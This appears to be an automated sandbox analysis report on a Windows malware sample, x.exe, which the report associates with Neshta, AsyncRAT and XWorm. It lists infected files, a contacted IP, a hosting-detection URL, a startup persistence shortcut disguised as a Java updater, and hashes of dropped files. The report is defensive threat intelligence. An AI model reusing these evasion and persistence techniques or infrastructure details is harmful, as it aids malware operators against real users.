                              C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe94%ReversingLabsWin32.Virus.Neshta
                              C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe83%VirustotalBrowse
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe89%VirustotalBrowse
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe90%VirustotalBrowse
                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe90%VirustotalBrowse
                              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe93%VirustotalBrowse
                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe89%VirustotalBrowse
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe89%VirustotalBrowse
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%ReversingLabsWin32.Virus.Neshuta
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%ReversingLabsWin32.Virus.Neshuta

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              SourceDetectionScannerLabelLink
                              ip-api.com0%VirustotalBrowse

                              URLs

                              SourceDetectionScannerLabelLink
                              http://nuget.org/NuGet.exe0%URL Reputationsafe
                              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                              https://contoso.com/License0%URL Reputationsafe
                              https://contoso.com/License0%URL Reputationsafe
                              https://contoso.com/Icon0%URL Reputationsafe
                              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                              https://aka.ms/pscore6lB0%URL Reputationsafe
                              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                              https://contoso.com/0%URL Reputationsafe
                              https://nuget.org/nuget.exe0%URL Reputationsafe
                              http://ip-api.com0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                              http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                              http://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
                              http://crl.m0%Avira URL Cloudsafe
                              https://github.com/Pester/Pester0%Avira URL Cloudsafe
                              https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith0%Avira URL Cloudsafe
                              http://crl.micro0%Avira URL Cloudsafe
                              https://ion=v4.50%Avira URL Cloudsafe
                              http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
                              http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte0%Avira URL Cloudsafe
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith0%VirustotalBrowse
                              http://www.autoitscript.com/autoit3/0%VirustotalBrowse
                              https://www.autoitscript.com/autoit3/0%VirustotalBrowse
                              http://www.autoitscript.com/autoit3/80%Avira URL Cloudsafe
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff0%Avira URL Cloudsafe
                              https://github.com/Pester/Pester1%VirustotalBrowse
                              45.141.26.2320%Avira URL Cloudsafe
                              http://www.autoitscript.com/autoit3/80%VirustotalBrowse
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff0%VirustotalBrowse
                              http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte0%VirustotalBrowse
                              45.141.26.2323%VirustotalBrowse

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              ip-api.com
                              		208.95.112.1
                              		truetrueunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://ip-api.com/line/?fields=hostingfalse
                              • URL Reputation: safe
                              		unknown
                              45.141.26.232true
                              • 3%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.autoitscript.com/autoit3/JAutoIt3_x64.exe.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://nsis.sf.net/NSIS_ErrorErrorsvchost.com, 00000003.00000002.1905492456.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.autoitscript.com/autoit3/Aut2exe.exe.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.autoitscript.com/autoit3/Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.mpowershell.exe, 00000013.00000002.2023438315.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithmsedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.micropowershell.exe, 00000013.00000002.1946659267.0000000000A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ion=v4.5powershell.exe, 00000013.00000002.1946659267.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://ip-api.comx.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.00000000030C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporteintegrator.exe.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.autoitscript.com/autoit3/8Aut2exe.exe.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffmsedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              208.95.112.1
                              		ip-api.comUnited States
                              		53334TUT-ASUStrue
                              45.141.26.232
                              		unknownNetherlands
                              		62068SPECTRAIPSpectraIPBVNLtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1465840
                              Start date and time:2024-07-02 06:51:07 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 31s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:30
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:x.exe
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.evad.winEXE@23/194@1/2
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 287
                              • Number of non-executed functions: 9
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              00:52:03API Interceptor86x Sleep call for process: powershell.exe modified
                              01:56:57API Interceptor62x Sleep call for process: x.exe modified
                              07:56:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              208.95.112.1Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                              • ip-api.com/json/
                              x433.exeGet hashmaliciousXWormBrowse
                              • ip-api.com/line/?fields=hosting
                              DriverUpdt.exeGet hashmaliciousXWormBrowse
                              • ip-api.com/line/?fields=hosting
                              rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ip-api.comRoblox Account Manager.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              x433.exeGet hashmaliciousXWormBrowse
                              • 208.95.112.1
                              DriverUpdt.exeGet hashmaliciousXWormBrowse
                              • 208.95.112.1
                              rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SPECTRAIPSpectraIPBVNLoniCmGMx16.exeGet hashmaliciousUnknownBrowse
                              • 45.144.167.158
                              zbRmQrzaHY.dllGet hashmaliciousWannacryBrowse
                              • 45.139.167.2
                              e9d0af516a8d65649c6850b69ff15e65cba280f8d44dbc505882dd16cf922320_dump.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                              • 45.138.16.219
                              filedoc3720001.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                              • 45.138.16.219
                              DND3243676432.exeGet hashmaliciousRemcosBrowse
                              • 45.141.215.89
                              Inventory-List.exeGet hashmaliciousRemcosBrowse
                              • 45.141.215.89
                              nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
                              • 45.141.27.41
                              y9vR6M5sU6.exeGet hashmaliciousAsyncRAT, XWormBrowse
                              • 45.141.26.119
                              84I4L4SXB5.exeGet hashmaliciousAveMaria, UACMeBrowse
                              • 45.138.16.138
                              0Yj49F0I3q.elfGet hashmaliciousUnknownBrowse
                              • 45.137.207.137
                              TUT-ASUSRoblox Account Manager.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              x433.exeGet hashmaliciousXWormBrowse
                              • 208.95.112.1
                              DriverUpdt.exeGet hashmaliciousXWormBrowse
                              • 208.95.112.1
                              rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exejava_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exejava_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                  C:\Program Files (x86)\AutoIt3\Au3Info.exejava_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                    C:\Program Files (x86)\AutoIt3\Au3Check.exejava_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse

                                      Created / dropped Files

                                      C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):275560
                                      Entropy (8bit):6.292868175467042
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCoP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvO9:Puo4VQjVsxyItKQNhigibKCM
                                      MD5:5BFFBD5E0AC5D8C8E8F7257912599415
                                      SHA1:5A9F6AB857410BB9F3108A5A6ACF8A7EBA58361F
                                      SHA-256:A3C4641D4CB4608AF18CD06E4C01339C65C25B9289F0AA01CABE0E5C250A0E15
                                      SHA-512:D576DEE2BF7C66293758F07B2A19B8659BA5A65D2FA9C05BA254008F30B46447871FC66B7DED6AD6796B34FB91406F17536DF6E8E2465723138A31A9C8DA5B36
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 97%
                                      Joe Sandbox View:
                                      • Filename: java_update.exe, Detection: malicious, Browse
                                      Reputation:low
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):217704
                                      Entropy (8bit):6.601006983838455
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC7xFVaK4T6fWSlXe0lJQafeyrR0kr/yh5DEU/Pk13TfwqiTP0McBUNnUxW:PuV2K4TSFo5Y683TdiQMcGNUl4N
                                      MD5:633E57697FE20B13A19E565EFB15550B
                                      SHA1:4D789F99FD6D9E3024E2E1A35922E875E5F3F113
                                      SHA-256:55075BDACF914AF03AD6CD417AFFC3A604A73AFD3D06A2256A1835CBF0F39B5E
                                      SHA-512:8C49A2C57A51C209E1B032C554AB2251F3DB6FA8FE0609B9EFE9A60412C9018A90B22F61D9027895432FC3615DB54A25DCD55CF5210BFAD7C73B3CF5906A15DB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Joe Sandbox View:
                                      • Filename: java_update.exe, Detection: malicious, Browse
                                      Reputation:low
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):237160
                                      Entropy (8bit):6.436536629191244
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCIyRnuBGwl/1Gc9QnvGqyWQ93kr/yh5DEU/P5kP0zU35iuvQBUeGMLu:Pu7l3wdYtcH9b5Y651zU77Ea
                                      MD5:80D5957764641A059A246ACC3B876FD8
                                      SHA1:379F4A825CF3B9EA2CBF96D0AFAA6F5192BE25A0
                                      SHA-256:B904C8888CD019FAD590E1135E917D944BC16340757BC90DDD3511359766B8BB
                                      SHA-512:4FE0AECD7F5B44FA5AC52165C566EEE57145AAA2AF59FBB449B7629511C3A727F09E3A91082DE7845490329619C90CA4ACAF4094CFD7888A97B7FBE1F70A7EAB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Joe Sandbox View:
                                      • Filename: java_update.exe, Detection: malicious, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1675872
                                      Entropy (8bit):7.454506618256521
                                      Encrypted:false
                                      SSDEEP:24576:PC51xB6B9YNgqe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+l:YK0eqkSR7Xgo4TiRPnLWvJY
                                      MD5:14FA88A275AB539403725314719128FA
                                      SHA1:2008F40C314CAE10B55206801AA1B1610F0A872F
                                      SHA-256:15D3823B1CB8C10E2F0A0882BC273093742E957F0E7DB05B98B8FF020897559D
                                      SHA-512:61CB80AD2D4D2E7AC85AADA0E97C5E9596F9AB26473EBDBB911D139BCD7E5EFA60F67B0D7EDAD98E9BBAD9C3E460082D06EBFBC045F536C786F3E98E53C28E23
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Joe Sandbox View:
                                      • Filename: java_update.exe, Detection: malicious, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1841760
                                      Entropy (8bit):7.347582112627405
                                      Encrypted:false
                                      SSDEEP:24576:tEeK2NocwiN/jc41p3qp11JsqbhOUe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+i:PfYP1JsEDkSR7Xgo4TiRPnLWvJD
                                      MD5:B7EAC627FCC70BC9F0368BA3D63DCCFC
                                      SHA1:553FEDAA430E83E64650D0BEE5062D4DA2CBF07D
                                      SHA-256:1DC472EF534923F12EFCA5AE928CC3E8545D1E468F905E693DF88D241C614A46
                                      SHA-512:1556951F835F60830738084CB17639BAC7F1E9DF6592F0F4D3D66365924C0395164CA76DC8F8D8E1AE0847E316D702D96D2D6152B62B69D29ADE3681566102D7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):346624
                                      Entropy (8bit):7.902529878602557
                                      Encrypted:false
                                      SSDEEP:6144:PuEpXDXz7yIrozs0WuNd3ojusBdgnNW6r4F53ttuGENGFdVCLEYnPO1D7YYoSyZV:59zGImAjJdcH4j3ttzFdVCLNSfHoSWCG
                                      MD5:49D006F81FC856B0ED3A6744396C6E82
                                      SHA1:9285A78391AA44520B5134F5EA46BD7FC4E01A2E
                                      SHA-256:FE301BD4EE2124BA25B1CE60C9BC9A7604089514C8A5CFE72F6E1AB2A17A8F1D
                                      SHA-512:3EB2D67DD36230C6468D2810E13EE7FCF25D84E5D099612F803C4F2AF309724FCC1896034A124DDFDA35FBB401DBC5D1030D87F4BF4F08FFDCD1682F0BA1A634
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 94%
                                      • Antivirus: Virustotal, Detection: 83%, Browse
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

